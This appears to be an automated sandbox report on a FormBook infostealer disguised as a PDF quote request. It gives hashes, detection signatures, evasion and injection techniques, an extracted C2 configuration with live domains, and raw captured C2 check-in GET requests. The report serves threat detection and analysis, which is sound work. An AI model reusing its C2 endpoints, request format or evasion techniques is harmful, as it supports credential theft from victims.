Analysis Report RFQ_AP65425652_032421 isu-isu,pdf.exe

Overview

General Information

Sample Name: RFQ_AP65425652_032421 isu-isu,pdf.exe
Analysis ID: 383968
MD5: 98f9ea244308bb5969ea3c302c32efcd
SHA1: 82a913894418af7834d23bc543eb286230d4edf4
SHA256: cd292d4cdb5ff8f2de087a09de2a152722d910f1df7ce7b65e6480be9ae77fdf
Tags: exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.luegomusic.com/pe0r/"], "decoy": ["quickeasybites.com", "idilecup.com", "atelierdusalon.com", "tigerking-safe.com", "goinyourstrength.com", "ssfgasia.com", "halmanseger.com", "hpcovn.com", "thegodfatherricedealer.com", "hzmsbg.com", "trickswithwix.com", "rbvctiu.com", "spystoredevices.com", "monlexiem.com", "apt-forward.com", "medsez.cloud", "nanantz.com", "kf350.com", "ztvwgqjya.com", "countingeverything.com", "motion-mill-tv.com", "mex33.info", "desertfoxindustries.com", "welchmanlongbow.com", "beachnovotel.com", "basicchan.com", "boekhoudingwetteren.com", "pierresplayhouse.com", "xitiefilm.com", "betterskindays.com", "hdeamutfak.com", "sqjqw4.com", "coloradocouponclub.com", "leadershipcodes.com", "simplysouthdisinfecting.net", "lideresdeimmunocal.com", "tipsaglik.com", "greaterluxuryrehab.info", "tennesseewheelrepair.com", "5150shoshone.com", "slot-782.com", "cubitia.net", "fudweisj.icu", "forguyshere.com", "connect-alert-status.network", "hannahkaylewis.com", "soarcredits.com", "queensindustrial.com", "kudzuentertains.com", "maconhemorrhoidcenter.com", "1364kensington.com", "prestamosa.com", "lifeisgoingwells.com", "cloverunner.com", "4608capaydrive.com", "neomily.xyz", "blushingdevil.com", "essentials-trading.com", "theinfoinsider.com", "heftylefties.com", "zea-px16z.net", "thecapitalhut.com", "rootedwithlovejax.com", "nesreenibrahimmd.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll ReversingLabs: Detection: 22%
Multi AV Scanner detection for submitted file
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Virustotal: Detection: 35% Perma Link
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe ReversingLabs: Detection: 41%
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.4ca7960.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.a0a460.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 0_2_00405301
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 0_2_00405C94
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_004026BC FindFirstFileA, 0_2_004026BC

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.luegomusic.com/pe0r/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.1364kensington.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.luegomusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.kf350.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.pierresplayhouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.thecapitalhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.ssfgasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.desertfoxindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.tennesseewheelrepair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.rootedwithlovejax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.59.242.153 199.59.242.153
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View ASN Name: BIZLAND-SDUS BIZLAND-SDUS
Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.1364kensington.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.luegomusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.kf350.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.pierresplayhouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.thecapitalhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.ssfgasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.desertfoxindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.tennesseewheelrepair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.rootedwithlovejax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.1364kensington.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 11:22:07 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: http://business.google.com/
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/&quot;
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.660312730.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/localservices
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://business.google.com
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://lh5.googleusercontent.com/tnT1qBMzmyLgRDNYg3gq78quEpuZVERk849E090SPkl3uZ90NtOdF0DdK28eDthwrR
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://rootedwithlovejax.com
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://schema.org/LocalBusiness
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://workspace.google.com
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/maps/dir//Rooted
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/_/mss/boq-geo/_/js/k=boq-geo.GeoMerchantPrestoSiteUi.en_US.H3HiHVucosI.es5.O

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404EA0

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
